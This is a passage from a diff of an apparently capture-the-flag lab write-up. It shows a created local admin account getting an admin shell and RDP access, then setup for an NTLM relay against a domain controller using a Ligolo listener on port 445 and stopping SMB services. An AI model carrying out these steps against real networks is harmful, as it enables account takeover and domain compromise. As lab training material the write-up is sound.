zinzloun/THM_WriteUP/README.md

     [+] added user support.it as local administrator [+] deleting payload from C:\Users\watamet\AppData\Local\Temp\2\nightmare.dll

-Verify if we can get a cmd as administrator:
+Verify if we can get a cmd shell as administrator:

     PS C:\Users\watamet\Music> runas /user:support.it cmd.exe
     Enter the password for support.it:
     Attempting to start cmd.exe as user "PC-FILESRV01\support.it" ...

 A new administrator cmd window should appear.
-I added the created user to the remote desktop group:
+With this shell I added the created user to the remote desktop group:

     net localgroup "Remote Desktop Users" support.it /add

-And I logged in as the newly created user to PC-FILESRV01, with RDP
+And I logged in PC-FILESRV01 as support.it, using Remmina.

+### Compromise the DC
 The next target is the domain controller.
 As we know we have to set up an NTML relay attack.
-The main problem here is that our attacker machine is not directed connected to the holo network, so we need to forward the traffic to us.
-The others requiremnts are satisfied since:
+The main problem here is that our attacker machine is not directed connected to the holo network, so we need to set up a remote relay.
+The others requiremnts to perform such attack are already satisfied:
-- We have compromised with administrator privileges: PC-FILESRV01
+- We have a compromised host with administrator privileges: PC-FILESRV01
-- THe target host has not SMB strict sign enabled: DC-SRV01
+- THe target host has not SMB packet strict sign enabled: DC-SRV01

-The other server (S-SRV02) inside the network cannot be use as target since SMB is not enabled.
-As said before, since we need to forward the SMB traffic from the compromoside host (PC-FILESRV01) to our attacker machine.
-To accomplish the task first I set another listener to the Ligolo agent on 10.200.95.33.
+The other server (S-SRV02) inside the network cannot be use as target since SMB is not enabled on this host.
+As said before, we need to forward the SMB traffic from the compromoside host (PC-FILESRV01) to our attacker machine.
+To accomplish the task, first I set another listener to the Ligolo agent on 10.200.95.33.
 This lisstener will forward all the SMB traffic from the agent (10.200.95.33) to our attacker machine, this will become clearer later:

-    listener_add --addr 0.0.0.0:445 --to 127.0.0.1:445 --tcp
+    [Agent : root@ip-10-200-95-33] » listener_add --addr 0.0.0.0:445 --to 127.0.0.1:445 --tcp

-Now we need to perform an invasive action, since we are going to stop all SMB related services and reboot the system in order to free port 445.
-Perform the following commands in a CMD running as administrator:
+Now we need to perform an invasive action (hoping that the blue team guys are on vacation :)), since we are going to stop all SMB related services and reboot the system, in order to free port 445.
+Let's proceed to perform the following commands in a CMD running as administrator:

     sc stop netlogon
     sc stop lanmanserver